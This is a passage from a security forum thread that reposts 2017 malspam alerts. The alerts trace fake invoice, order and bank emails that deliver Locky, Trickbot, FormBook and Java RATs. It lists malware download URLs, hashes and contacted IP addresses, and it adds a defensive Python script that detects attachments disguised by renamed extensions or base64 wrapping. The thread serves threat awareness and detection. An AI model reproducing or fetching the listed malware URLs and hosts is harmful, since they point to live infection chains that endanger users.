604173.7z: Extracts to: Invoice_930546166795.vbs - Current Virus total detections 10/58*. Payload Security**
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/816f7822d86ec7cc7d73b6458658e7e2bb3e600811aa068d9f2611fd21825268/analysis/1506683968/

** https://www.virustotal.com/en/file/816f7822d86ec7cc7d73b6458658e7e2bb3e600811aa068d9f2611fd21825268/analysis/1506683968/
Contacted Hosts
185.57.172.213: https://www.virustotal.com/en/ip-address/185.57.172.213/information/
___

Fake 'order' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-order-malspam-email-with-uue-attachment-delivers-malware/
29 Sep 2017 - "... malware today, all using -different- or unusual delivery methods. This next example is about an order confirmation. The attachment is a .uue attachment. Winzip says it can open .UUE files but only extracted a -garbled- encrypted/encoded txt file. Universal extractor extracted a working .exe file...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/pecindia_order_email.png

order290917.uue: (VirusTotal 4/58*) - Extracts to: order290917.exe - Current Virus total detections 14/64**
Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/fb486990afc3ca4f4510d61c38e426284ea15c1dac426c7871c60757b5b6818d/analysis/1506681970/
order290917.uue

** https://www.virustotal.com/en/file/38fc1b4fbd4f3c4e78179775436a791fcc476d4ba3c4628fc3b6d1e618cbe837/analysis/1506696900/
order290917.exe

*** https://www.hybrid-analysis.com/sample/38fc1b4fbd4f3c4e78179775436a791fcc476d4ba3c4628fc3b6d1e618cbe837?environmentId=100

:fear::fear: :mad:

AplusWebMaster
2017-10-02, 20:58
FYI...

Fake 'order' SPAM - delivers malware
- https://myonlinesecurity.co.uk/another-fake-order-email-with-rtf-attachment-delivers-malware/
2 Oct 2017 - "An email with the subject of 'Fwd: Re: Order' pretending to come from info@ anashin .am with a malicious word doc attachment delivers malware...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/order_02101777_doc_email.png

Order0210177.doc - Current Virus total detections 15/58*. Payload Security** downloads
http ://birsekermasali .com/hta/gen.hta (VirusTotal 15/57[3]) (Payload Security[4]) which in turn downloads
http ://birsekermasali .com/css_files/gen/quote.exe (VirusTotal 25/66[5]) (Payload Security[6])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/fd8ed18547954c8355cef69167f01ebc65330ba585e24645beb977967a01e322/analysis/1506949614/
Order0210177.doc

** https://www.hybrid-analysis.com/sample/fd8ed18547954c8355cef69167f01ebc65330ba585e24645beb977967a01e322?environmentId=100
DNS Requests
192.185.115.14

3] https://www.virustotal.com/en/file/48366f986beed7c17dca2b741b99c8f2da2cf12032d4eb19bf5cd8bc851a4af6/analysis/1506968237/
gen.hta

4] https://www.hybrid-analysis.com/sample/48366f986beed7c17dca2b741b99c8f2da2cf12032d4eb19bf5cd8bc851a4af6?environmentId=100
Contacted Hosts
192.185.115.14
198.187.29.143

5] https://www.virustotal.com/en/file/4cd3e00e939755dee6c24a31517c9e2c30a285420328234d26944e6d337df458/analysis/1506967286/
quote.exe

6] https://www.hybrid-analysis.com/sample/4cd3e00e939755dee6c24a31517c9e2c30a285420328234d26944e6d337df458?environmentId=100

birsekermasali .com: 192.185.115.14: https://www.virustotal.com/en/ip-address/192.185.115.14/information/
> https://www.virustotal.com/en/url/e3624a8df83ad5e6705b5221814e2f6eca70518cf8355d62e69c902a96fc43f3/analysis/

> https://www.virustotal.com/en/url/dd0ea4ed7f9b1d828bbafc013baeb7dd1ce727788e68ab696cbedbc8e9b26ef3/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-10-03, 19:34
FYI...

Fake 'FedEx' SPAM - leads to info stealer
- https://isc.sans.edu/diary/rss/22888
2017-10-03 - "... On Monday 2017-10-02, I ran across malicious spam (malspam) pushing Formbook, an information stealer. Arbor Networks has a good article about Formbook here:
> https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/
... The email is disguised as a 'FedEx delivery notice'. It has a-link-to-a-compromised-website that's hosting malware. The link points to a supposed document for this fake delivery:
> https://isc.sans.edu/diaryimages/images/2017-10-03-ISC-diary-image-01.jpg
Clicking on-the-link (DON'T) returned a RAR archive. The RAR archive contains a Windows executable that's poorly-disguised as some sort of receipt... indicators seen during the infection from Formbook malspam on Monday 2017-10-02:
Email:
Date/Time: 2017-11-02 at 14:23 UTC
Subject: Re: Alert: FedEx OFFICE Delivery® ... 17-10-02, at 07:22:11 AM BA
From: "DOCUMENT2017" <gifcos@ tutanota.com>
Link from the email: hxxps ://superiorleather .co.uk/Receipt.r22
Traffic seen when retrieving the RAR archive:
185.46.121.66 [1] port 443 - superiorleather .co.uk - GET /Receipt.r22 ..."
1] 185.46.121.66: https://www.virustotal.com/en/ip-address/185.46.121.66/information/
> https://www.virustotal.com/en/url/97b66925f5ddbb92974955a3cc28c0d6d6049cedc3bdc9497f1334c0dcfc6369/analysis/
Post-infection traffic:
..."
(More detail @ the isc URL above.)

> http://www.malware-traffic-analysis.net/2017/10/03/index.html
___

Fake 'Shipping' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-valero-com-re-shipping-arrangement-process-malspam-delivers-malware/
3 Oct 2017 - "... an email with the subject of 'Re: Shipping arrangement process' pretending to come from Valero .com but coming from Anna Brugt <dhen.ordonez@ ritetrend .com.ph>...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Shipping-arrangement-process.png

There is a-link-in-the-email body to
http ://www.oysterpublicschool .com//hy/reciept/_outputC9E322F.exe which gives a 404,
but there is also a RAR attachment with a file of the same name. It is highly likely that other versions of this email will have a different download link, that might be active.

_outputC9E322F.rar: Extracts to: _outputC9E322F.exe - Current Virus total detections 15/66*. Payload Security**
The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/262b9b396f8c02ed1f8ff7b3b99fe6d017ee7023be97ecdc8db6b8d711f7102f/analysis/1507051011/
_outputC9E322F.exe

** https://www.hybrid-analysis.com/sample/262b9b396f8c02ed1f8ff7b3b99fe6d017ee7023be97ecdc8db6b8d711f7102f?environmentId=100
Contacted Hosts
109.169.89.11

oysterpublicschool .com: 192.185.115.66: https://www.virustotal.com/en/ip-address/192.185.115.66/information/
___

Fake 'Cash Statement' SPAM - delivers malware
- https://myonlinesecurity.co.uk/cash-statement-of-account-10032017-malspam-delivers-malware/
3 Oct 2017 - "... Malware downloaders... an email with the subject of 'Cash Statement of Account 10/03/2017' coming from Front Desk <reception@ st-timsrc .org>...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Cash-Statement-of-Account-10-03-2017.png

The email has a pdf attachment with a link to
https ://goo .gl/4tzM3b which redirects to
http ://uae-moneyremit .top/plugins/cfare.html where you see a page like this asking you to install a plugin to view the page:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/plugin_needed.png

Pressing install will download
https ://www.dropbox .com/s/piw5k38lytremqz/firefoxplugin_install.exe (VirusTotal 13/64*) (Payload Security**)

We have had a series of these emails recently; the one on 28 September 2017 was 'DAY END CASH PAYMENT REPORT AS ON 28/09/2017', which delivered fxplugin_install.exe (VirusTotal 44/65[3]) (Payload Security[4]), which was netwire RAT...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bfb120b45ffd594ebb95b4a23fb3f65b1099dd5045641cdd15de59c2296ca04d/analysis/1507058018/
firefoxplugin_install.exe

** https://www.hybrid-analysis.com/sample/bfb120b45ffd594ebb95b4a23fb3f65b1099dd5045641cdd15de59c2296ca04d?environmentId=100
Contacted Hosts
5.206.227.248

3] https://www.virustotal.com/en/file/244690f195b6fcd12d57f1b6d1a0114619d4e8e6f06df2de28e055be74c2252b/analysis/1506917666/

4] https://www.hybrid-analysis.com/sample/244690f195b6fcd12d57f1b6d1a0114619d4e8e6f06df2de28e055be74c2252b?environmentId=100
Contacted Hosts
85.159.233.23

:fear::fear: :mad:

AplusWebMaster
2017-10-04, 11:46
FYI...

Fake 'Copy of invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-screwfix-copy-of-invoice-a5165059014-please-find-your-invoice-attached-delivers-locky-ransomware/
4 Oct 2017 - "... Locky downloaders... an email with the subject of 'Copy of invoice A5165059014. Please find your invoice attached' pretending to come from online@ screwfix .com...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Copy-of-invoice-A5165059014-Please-find-your-invoice-attached.png

InvoiceA5165059014.7z: Extracts to: Invoice558727316499528791952132.vbs - Current Virus total detections 6/59*
Payload Security** downloads from one of these hard coded locations in this vbs. (There will be numerous others):
"spazioireos .it/8etyfh3ni?",
"derainlay .info/p66/8etyfh3ni",
"turfschiploge .nl/8etyfh3ni?" (VirusTotal 16/65[3])...

> Update: current list of known download sites PASTEBIN(a) thanks to Racco42(b)
a) https://pastebin.com/ajXf4k0f
b) https://twitter.com/Racco42

The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/db5a2c3afd9f6a4ba6ab97309bc7e08603626f3d6a8170a14fc9c527b13ab751/analysis/1507106667/
Invoice558727316499528791952132.vbs

** https://www.hybrid-analysis.com/sample/db5a2c3afd9f6a4ba6ab97309bc7e08603626f3d6a8170a14fc9c527b13ab751?environmentId=100
Contacted Hosts
81.29.205.233

3] https://www.virustotal.com/en/file/7c88ec63f7ca11a22add9f77f47f7ac8f71e930b3dd24422940c28cc8fd22ac2/analysis/1507107227/

spazioireos .it: 81.29.205.233: https://www.virustotal.com/en/ip-address/81.29.205.233/information/

derainlay .info: https://en.wikipedia.org/wiki/Fast_flux

turfschiploge .nl: 46.235.43.11: https://www.virustotal.com/en/ip-address/46.235.43.11/information/
___

Fake 'Payment Confirmation' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/fake-xpress-money-payment-confirmation-delivers-java-adwind/
4 Oct 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments or -links- to download them. I have previously mentioned many of these HERE[1]...
1] https://myonlinesecurity.co.uk/?s=java+adwind

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Xpress-Money-Payment-Confirmation.png

Xpress Money Payment Confirmation.jar (462kb) - Current Virus total detections 16/62*. Payload Security**...
All the links-in-the-email (including the -image- of an XLS file) go to the-same-url (guaranteed to be a compromised site), where all the site content is now about QTUM, a -bitcoin- exchange (I have been seeing several compromised malware delivery sites recently with all their content changed to the QTUM content), to download a zip file:
http ://restaurantelburladero .com/Xpress Money Payment Confirmation.z (.z is a file extension that many unzipping utilities will extract from, although not commonly used)... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e724c779d3bd6062dda5f682d85a2cd715278c4950ee38e5f54918b9b41137ac/analysis/1507035357/
Scan 2017100323 114727.xls Here.JAR

** https://www.hybrid-analysis.com/sample/e724c779d3bd6062dda5f682d85a2cd715278c4950ee38e5f54918b9b41137ac?environmentId=100
Contacted Hosts
216.58.209.238

restaurantelburladero .com: 5.2.88.79: https://www.virustotal.com/en/ip-address/5.2.88.79/information/
> https://www.virustotal.com/en/url/a5aa2bd46bc8d1f005c35ce2ea482cb7f8c9316b5e478594bfe9e1bafd31fc97/analysis/
___

'Dnsmasq' - multiple vulnerabilities
> https://www.helpnetsecurity.com/2017/10/03/dnsmasq-flaws/
Oct 3, 2017
> https://www.kb.cert.org/vuls/id/973527
2 Oct 2017
> http://www.securitytracker.com/id/1039474
Oct 2 2017

:fear::fear: :mad:

AplusWebMaster
2017-10-05, 12:49
FYI...

Fake 'Payment Advice' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-hsbc-important-payment-advice-delivers-trickbot-banking-trojan/
5 Oct 2017 - "An email with the subject of 'Important – Payment Advice' pretending to come from HSBC but actually coming from a look-a-like domain HSBC <no-reply@ hsbcpaymentadvice .com> or HSBC <no-reply@ hsbcadvice .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan... there is a slight formatting problem in Outlook, where the emails arrive with a -blank- body. Reading in plain text or using view source, shows the content...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Important-Payment-Advice_-HSBC.png

SecureMessage.doc - Current Virus total detections 10/59*. Payload Security**
This malware file downloads from
http ://diga-consult .de/ser1004.png which of course is -not- an image file but a renamed .exe file that gets renamed to aqdccc.exE (VirusTotal 13/65***). An alternative download location is
http ://hill-familie .de/ser1004.png
This email -attachment- contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/hsbc_PaymentAdvice_doc_4_Oct_17.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0d92b1656112ed73fe98fd6c714d7959dd8ecc85759b87a6b01747a2ab0f8335/analysis/1507166812/

** https://www.hybrid-analysis.com/sample/0d92b1656112ed73fe98fd6c714d7959dd8ecc85759b87a6b01747a2ab0f8335?environmentId=100
Contacted Hosts
87.106.222.158
64.182.208.181
194.87.92.191

*** https://www.virustotal.com/en/file/ab12a6b6d3f7ab00630fbb9558b725c2d25cf59a133ee0db807eaf3e851c3e4b/analysis/1507170157/
ser1004.png

diga-consult .de: 87.106.222.158: https://www.virustotal.com/en/ip-address/87.106.222.158/information/
> https://www.virustotal.com/en/url/591dff2bb6262e18057455d99487270cb3da5d662db3de596ec573a645518c0e/analysis/

hill-familie .de: 148.251.5.116: https://www.virustotal.com/en/ip-address/148.251.5.116/information/
> https://www.virustotal.com/en/url/cf879c9b691a8a5cfe4398dc1ae885c1e999c7eeb35e7947ed0174f011227ff4/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-10-06, 14:39
FYI...

Fake 'Payment history' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-freaky-friday-your-remittance-advice-with-base64-encoded-attachments-to-emails-instead-of-zip-files/
6 Oct 2017 - "... Locky downloaders... an email with the subject of 'Payment history' pretending to come from accounts @ random email addresses and companies... encoding the files today and the so called 7z attachment is actually a base64 file that needs decoding to get the 7z file, before extracting the VBS...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Remittance-Advice_-locky-email.png

62046_Remittance.7z: decoded from base 64 and Extracts to: 872042 Remittance.vbs
Current Virus total detections 9/60*. Payload Security**
This particular VBS has these URLs hardcoded (there will be loads of others)
"asheardontheradiogreens .com/uywtfgh36?”,
”thedarkpvp .net/p66/uywtfgh36″
”2-wave .com/uywtfgh36?” (VirusTotal 14/66[3]) (Payload Security[4])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a53ad9751059a2c1d298cb11868c3016ebc40cb69c562d7b1d5fad1dae75e581/analysis/1507281470/
872042 Remittance.vbs

** https://www.hybrid-analysis.com/sample/a53ad9751059a2c1d298cb11868c3016ebc40cb69c562d7b1d5fad1dae75e581?environmentId=100
Contacted Hosts
216.58.213.142
74.125.160.39
199.30.241.139
91.142.170.187
209.54.62.81

3] https://www.virustotal.com/en/file/716f616221f5e45a9e45edb013ab59fdf27c000e0e6dcb77267c37f09ad75589/analysis/1507281734/
freSUUFBdtY.exe

4] https://www.hybrid-analysis.com/sample/716f616221f5e45a9e45edb013ab59fdf27c000e0e6dcb77267c37f09ad75589?environmentId=100
Contacted Hosts
173.223.106.227

asheardontheradiogreens .com: 199.30.241.139: https://www.virustotal.com/en/ip-address/199.30.241.139/information/

thedarkpvp .net: https://en.wikipedia.org/wiki/Fast_flux

2-wave .com: 209.54.62.81: https://www.virustotal.com/en/ip-address/209.54.62.81/information/

:fear::fear: :mad:

AplusWebMaster
2017-10-09, 13:51
FYI...

Fake 'Remittance Advice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-mess-up-monday-still-base64-files-not-working-zips/
9 Oct 2017 - "... Locky downloaders... the same email as last Friday* with the subject of 'Your Remittance Advice' pretending to come from accounts @ random email addresses and companies...
* https://myonlinesecurity.co.uk/locky-freaky-friday-your-remittance-advice-with-base64-encoded-attachments-to-emails-instead-of-zip-files/

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Remittance-Advice_-locky-email.png

43699 Remittance.7z: decoded from base 64 and Extracts to: Invoice IP8729962.vbs
Current Virus total detections 6/59*. Payload Security** | This particular VBS has these URLs hardcoded (there will be loads of others)
“anderlaw .com/8734gf3hf?”,
”scottfranch .org/p66/8734gf3hf”,
”cagliaricity .it/8734gf3hf?” (VirusTotal 13/65***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5355686920487f0b58f82532217c188d9f822d1264b71cc2d71e2b85b68ebd9c/analysis/1507542515/
Invoice IP8729962.vbs

** https://www.hybrid-analysis.com/sample/5355686920487f0b58f82532217c188d9f822d1264b71cc2d71e2b85b68ebd9c?environmentId=100
Contacted Hosts
98.124.251.69

*** https://www.virustotal.com/en/file/203ee7bc02c3d2b01584efc23b5240fdbc37c56a99b17cef8983ff59f564ab18/analysis/1507543011/
MEyrCrdQK.exe

anderlaw .com: 98.124.251.69: https://www.virustotal.com/en/ip-address/98.124.251.69/information/
> https://www.virustotal.com/en/url/76b1549c600071ca63de056708c397a147600de9adbc40982bb3724057aa23e9/analysis/

scottfranch .org: https://en.wikipedia.org/wiki/Fast_flux

cagliaricity .it: 95.110.196.214: https://www.virustotal.com/en/ip-address/95.110.196.214/information/
> https://www.virustotal.com/en/url/82885e203fdf3ad7cf7d022bd97374303910223d9248fbb4b6ab33a4029bc176/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-10-10, 15:27
FYI...

'FormBook' malware...
- https://www.helpnetsecurity.com/2017/10/10/formbook-malware/
Oct 10, 2017 - "Information stealing FormBook malware is being lobbed at defense contractors, manufacturers and firms in the aerospace sector in the US and South Korea... The malware is delivered via high-volume spam campaigns and email attachments that take the form of:
- DOC/XLS files loaded with malicious macros that initiate the download of FormBook payloads
- Archive files containing FormBook executable files
- PDFs containing links to the tny .im URL-shortening service, which point to FormBook executables hosted on a staging server.
> https://www.helpnetsecurity.com/images/posts/formbook-industry.jpg
... The emails are made to look like they are coming from FedEx and DHL (with the PDF attachment), as emails delivering invoices, price quotations or purchase orders (with the malicious-macros-carrying Office files), and payment confirmations and purchase orders (archive files containing malicious executables)..."

> https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html
Oct 05, 2017

clicks-track .info: 188.209.52.47: https://www.virustotal.com/en/ip-address/188.209.52.47/information/
> https://www.virustotal.com/en/url/f496eee1eafc7c7ecb83f7538e0b835aad256932aac1a855c34df847b9e65654/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-10-11, 15:16
FYI...

Fake 'Amazon' SPAM - delivers banking trojan
- https://myonlinesecurity.co.uk/fake-amazon-associates-network-malspam-email-delivers-cthonic-banking-trojan/
11 Oct 2017 - "... malware scammers are imitating Amazon Associates to deliver their malware. An email with the subject of coming from 'Amazon Associates Network' <erikam1@ umbc .edu> with a malicious word doc or Excel XLS spreadsheet attachment delivers Cthonic banking trojan. These are coming via a -compromised- umbc .edu email account. All the sites in the malware delivery chain are -compromised- sites...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/amazon_associates-network-email.png

The link-in-the-email goes to a broken link
ttps ://www.angelbasar .de/skin/form.php it should be
https ://www.angelbasar .de/skin/form.php where it downloads Your account, statement.docm
Current Virus total detections 5/61*. Payload Security** Where you can see the same screenshots as described yesterday where the content only appears after enabling and allowing macros to run. This malware doc downloads from
http ://shirtlounge .eu/skin/priv8.exe (VirusTotal 50/62[3]) (Payload Security[4]) Cthonic banking trojan...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4ae26d1113eb2cdb0f18cedb036179cfaf0ff74e0cb6a605e4cdf357e3109a8c/analysis/1507708534/
bddca74a4da71137b8f780ff9c959a54_doc

** https://www.hybrid-analysis.com/sample/4ae26d1113eb2cdb0f18cedb036179cfaf0ff74e0cb6a605e4cdf357e3109a8c?environmentId=100

3] https://www.virustotal.com/en/file/1c950172857b52c45d8a480acd3d14b5cc1877acf0bef9aaad55ff73990fe217/analysis/
A.exe

4] https://www.hybrid-analysis.com/sample/3a1f44f289b6a2e3b3fc5bdc847bd3fe854d048636a06e89ecca931b1804678f?environmentId=100
Contacted Hosts
104.238.186.189
87.98.175.85
5.9.49.12
144.76.133.38
49.51.33.103
93.170.96.235
85.159.213.210
37.187.16.17
31.3.135.232
62.113.203.55
62.113.203.99

angelbasar .de: 82.165.238.218: https://www.virustotal.com/en/ip-address/82.165.238.218/information/
> https://www.virustotal.com/en/url/7d425575c76f387d8f7423afef9440a29fdbc361cd46a4942e0e323da8d14e3a/analysis/

shirtlounge .eu: 85.214.130.213: https://www.virustotal.com/en/ip-address/85.214.130.213/information/
> https://www.virustotal.com/en/url/9b2a3fc17029f6a53b537b4a564e787ab67a3af1177131a6a67a045fd824fd4c/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-10-12, 14:57
FYI...

Equifax website hacked again - redirects to fake Flash update
- https://arstechnica.com/information-technology/2017/10/equifax-website-hacked-again-this-time-to-redirect-to-fake-flash-update/
10/12/2017 - "In May credit reporting service Equifax's website was breached by attackers who eventually made off with Social Security numbers, names, and a dizzying amount of other details for some 145.5 million US consumers. For several hours on Wednesday the site was compromised again, this time to deliver -fraudulent- Adobe Flash updates, which when clicked, infected visitors' computers with adware that was detected by only three of 65 antivirus providers. Randy Abrams, an independent security analyst by day, happened to visit the site Wednesday evening to contest what he said was false information he had just found on his credit report. Eventually, his browser opened up a page on the domain hxxp :centerbluray .info that looked like this:
> https://cdn.arstechnica.net/wp-content/uploads/2017/10/first-flash.jpg
... he encountered the -bogus- Flash download links on at least three subsequent visits. The picture above this post is the higher-resolution screenshot he captured during one visit... The file that got delivered when Abrams clicked through is called MediaDownloaderIron.exe. This VirusTotal entry* shows only Panda, Symantec, and Webroot detecting the file as adware. This separate malware analysis from Packet Security** shows the code is highly obfuscated and takes pains to conceal itself from reverse engineering. Malwarebytes[3] flagged the centerbluray .info site as one that pushes malware, while both Eset and Avira provided similar malware warnings for one of the intermediate domains, newcyclevaults .com. In the hour this post was being reported and written, Abrams was unable to reproduce the -redirects- leading to the malicious download. It's possible Equifax has cleaned up its site. It's also possible the attackers have shut down for the night and have the ability to return at will to visit still worse misfortunes on visitors. Equifax representatives didn't respond to an e-mail that included a link to the video and sought comment for this post."
* https://www.virustotal.com/en/file/6153f429c0cedc721846e60255834ae0f43829cc6a387b766de6f301dab54eca/analysis/1506995209/
MediaDownloaderIron.exe

** https://www.hybrid-analysis.com/sample/6153f429c0cedc721846e60255834ae0f43829cc6a387b766de6f301dab54eca?environmentId=100

3] https://www.virustotal.com/en/url/f66a103e2df039c7f0b918dec692546d84d516321d5367f6b03c8c79f9251cc7/analysis/

centerbluray .info: Could not find an IP address for this domain name...

newcyclevaults .com: Could not find an IP address for this domain name...

:fear::fear: :mad:

AplusWebMaster
2017-10-17, 14:21
FYI...

Fake 'MoneyGram' SPAM - delivers java trojan
- https://myonlinesecurity.co.uk/fake-moneygram-important-transaction-query-malspam-delivers-java-trojan/
17 Oct 2017 - "... fake financial themed emails containing java adwind or Java Jacksbot attachments...
The link-in-the-email goes to a zip file which doesn’t extract. However if you rename the zip to .rar it does...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/fake-Moneygram-Important-Transaction-Query.png

The link-in-the-email goes to
http ://analab .it/TransactionQuery_10-16-2017.zip which is actually a .rar file that needs to be renamed to .rar to extract it.
TransactionQuery_10-16-2017.jar (307kb) - Current Virus total detections 19/58*. Payload Security**... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5929096cdbee19f5fced5a00d69305c788ea1f7978655b1530ab52f1ee6c5185/analysis/
TransactionQuery_10-16-2017.jar

** https://www.hybrid-analysis.com/sample/5929096cdbee19f5fced5a00d69305c788ea1f7978655b1530ab52f1ee6c5185?environmentId=100
DNS Requests
46.183.223.33: https://www.virustotal.com/en/ip-address/46.183.223.33/information/

analab .it: 62.149.205.46: https://www.virustotal.com/en/ip-address/62.149.205.46/information/
> https://www.virustotal.com/en/url/87b939095608c9dce36939f1566be3e5479d6f55286a4eac5b3acacafdcc7ff2/analysis/
___

FBI press releases
> https://www.fbi.gov/news/pressrel

10.17.2017: Twelve People Indicted Installing Credit-Card Skimmers on Gas Pumps in Five States and Stealing Account Information from Thousands

10.17.2017: Two Women, Including Former Associate Dean of Caldwell University, Admit Defrauding Veterans’ G.I. Bill

10.17.2017: Doctor Admits Billing Medicare, Other Insurers $3 Million for Therapy Services Performed by Unqualified Personnel

10.17.2017: New York Man Sentenced to 43 Months in Prison for Robbing Bergen County, New Jersey Bank

:fear::fear: :mad:
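Several of the posts above turn on the same trick: the attachment's name lies about its content. ser1004.png and kas47.png are renamed .exe files, the "7z" attachments in the Locky runs are base64 text that has to be decoded before there is a 7z archive to extract, and the MoneyGram "zip" is really a RAR. The following is an added example, not code from myonlinesecurity.co.uk or from this forum, showing how a mail gateway or analyst script can ignore the claimed extension and classify the bytes themselves, unwrapping one base64 layer when the raw bytes match nothing. The sample inputs are constructed, zero-padded headers that only reuse the file names from the posts; they are not the real malware.

```python
"""Triage e-mail attachments by their real content, not their claimed name.

Added example (not from the quoted posts): sniff well-known magic bytes,
optionally after stripping one base64 text layer, and compare the result
with what the file extension claims.
"""
from __future__ import annotations

import base64
import binascii
import re

# Well-known file headers (magic bytes), checked by prefix match.
SIGNATURES = {
    b"MZ": "PE executable",
    b"PK\x03\x04": "ZIP container",            # also .jar, .docx, .xlsx
    b"Rar!\x1a\x07": "RAR archive",
    b"7z\xbc\xaf\x27\x1c": "7-Zip archive",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE2 compound file",  # legacy .doc/.xls
    b"%PDF": "PDF document",
}

# What each claimed extension should look like inside.
EXPECTED = {
    "exe": {"PE executable"},
    "zip": {"ZIP container"}, "jar": {"ZIP container"},
    "docx": {"ZIP container"}, "xlsx": {"ZIP container"},
    "rar": {"RAR archive"},
    "7z": {"7-Zip archive"},
    "png": {"PNG image"},
    "doc": {"OLE2 compound file", "ZIP container"},  # Word also opens a renamed .docx
    "xls": {"OLE2 compound file", "ZIP container"},
    "pdf": {"PDF document"},
}

_B64_TEXT = re.compile(rb"^[A-Za-z0-9+/=\s]+$")


def sniff(data: bytes) -> str:
    """Name the container/format from the leading bytes."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def unwrap_base64(data: bytes) -> bytes | None:
    """Decode one base64 layer if the blob looks like base64 text, else None."""
    body = data.strip()
    if not body or not _B64_TEXT.match(body):
        return None
    try:
        decoded = base64.b64decode(body)   # whitespace is discarded by default
    except (binascii.Error, ValueError):
        return None
    return decoded or None


def triage(filename: str, data: bytes) -> dict:
    """Compare the claimed extension with the sniffed content, unwrapping base64."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    layers = []
    kind = sniff(data)
    if kind == "unknown":                  # nothing recognisable: maybe text-wrapped
        inner = unwrap_base64(data)
        if inner is not None:
            layers.append("base64")
            data, kind = inner, sniff(inner)
    mismatch = ext in EXPECTED and kind not in EXPECTED[ext]
    return {
        "claimed": ext or "(none)",
        "actual": kind,
        "layers": layers,
        "mismatch": mismatch,
        # Worth a second look if the name lies or the bytes arrived wrapped in text.
        "suspicious": mismatch or bool(layers),
        "payload": data,
    }


# Constructed inputs mirroring the tricks in the posts (synthetic headers plus
# zero padding, not real samples; only the file names are taken from the posts).
SAMPLES = {
    "ser1004.png": b"MZ\x90\x00" + b"\x00" * 60,                                    # exe named .png
    "62046_Remittance.7z": base64.b64encode(b"7z\xbc\xaf\x27\x1c" + b"\x00" * 26),  # base64-wrapped 7z
    "TransactionQuery_10-16-2017.zip": b"Rar!\x1a\x07\x01\x00" + b"\x00" * 24,      # RAR named .zip
    "Invoice.docx": b"PK\x03\x04" + b"\x00" * 26,                                   # name and bytes agree
}


def run_samples() -> dict:
    """Triage every constructed sample; returns {filename: triage result}."""
    return {name: triage(name, blob) for name, blob in SAMPLES.items()}


if __name__ == "__main__":
    for name, r in run_samples().items():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{name:34} .{r['claimed']:<5} is {r['actual']:<18} via {r['layers'] or '-'} -> {flag}")
```

The base64 check deliberately runs only when the raw bytes match no signature, so a genuine archive is never mangled by a failed decode, and a wrapped one is flagged even when the inner type matches the extension, because legitimate mail clients do not ship an archive as a bare base64 text body.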

AplusWebMaster
2017-10-18, 15:55
FYI...

Fake 'Invoice' SPAM - delivers Locky or Trickbot
- https://myonlinesecurity.co.uk/necurs-downloaders-changed-to-fingerprint-the-computer-before-delivering-locky-or-trickbot/
18 Oct 2017 - "... downloaders from the Necurs botnet that deliver Locky ransomware or Trickbot banking trojan... I saw a few twitter links leading to this post on Bleeping Computer[1] saying that Locky (Necurs Downloaders) will take screenshots of the “victim’s” computer and send back error messages to base... Today's is an email pretending to come from invoicing@ random names and email addresses, with a subject like 'Invoice 009863361 10.18.2017' where the numbers are random with a blank/empty body...
One of the emails looks like:
From: Invoicing <Invoicing@ random name>
Date: Wed 18/10/2017 10:27
Subject: Invoice 009863361 10.18.2017
